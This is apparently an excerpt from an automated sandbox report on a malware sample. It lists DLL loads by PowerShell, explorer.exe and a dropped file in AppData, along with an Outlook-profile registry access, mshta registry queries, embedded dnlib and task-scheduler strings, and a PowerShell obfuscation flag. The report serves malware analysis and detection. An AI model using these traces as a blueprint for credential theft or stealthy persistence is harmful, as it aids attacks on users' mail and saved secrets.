Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgfugf	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgfugf	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgfugf	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgfugf	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgfugf	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgfugf	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: webio.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\icgfugf	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\icgfugf	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\icgfugf	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\icgfugf	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\icgfugf	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\icgfugf	Section loaded: ucrtbase_clr0400.dll

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source:	Binary string: $^q7C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.pdb source: powershell.exe, 00000004.00000002.1762483774.0000000004F17000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.1973004774.000000000707B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1971140719.00000000068D0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnetihascustomattributeczprocess_informationcxcydnlib.dotnet.mdrawassemblyrefrowhmdnlib.dotnet.writermethodbodychunkshlmicrosoft.win32.taskschedulernetworksettingshohnhihhhkhjhehdhghfhamicrosoft.win32.taskschedulertaskschedulersnapshothchbcronfieldtypesystem.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypefa`1hyhxdnlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowhzmicrosoft.win32.taskschedulertaskhuhthwdnlib.dotnet.writermetadataoptionshvhqdnlib.dotnetimdtokenproviderhphshrdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypeilimdnlib.dotnetifullnamecreatorhelperinioihiidnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsijikiddnlib.dotnet.emitiinstructionoperandresolverieigdnlib.utilslazylist`1iaibdnlib.dotnetpropertyattributesicdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamixiydnlib.dotnetclasssigizdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionitiuelemequalitycompareriviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvt
Source:	Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.PdbWriter+b source: powershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: aspnet_compiler.pdb source: icgfugf, 0000000F.00000000.2187284917.0000000000732000.00000002.00000001.01000000.0000000F.sdmp, icgfugf.14.dr
Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.1973004774.000000000707B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1971140719.00000000068D0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.1973004774.000000000707B000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

PowerShell case anomaly found

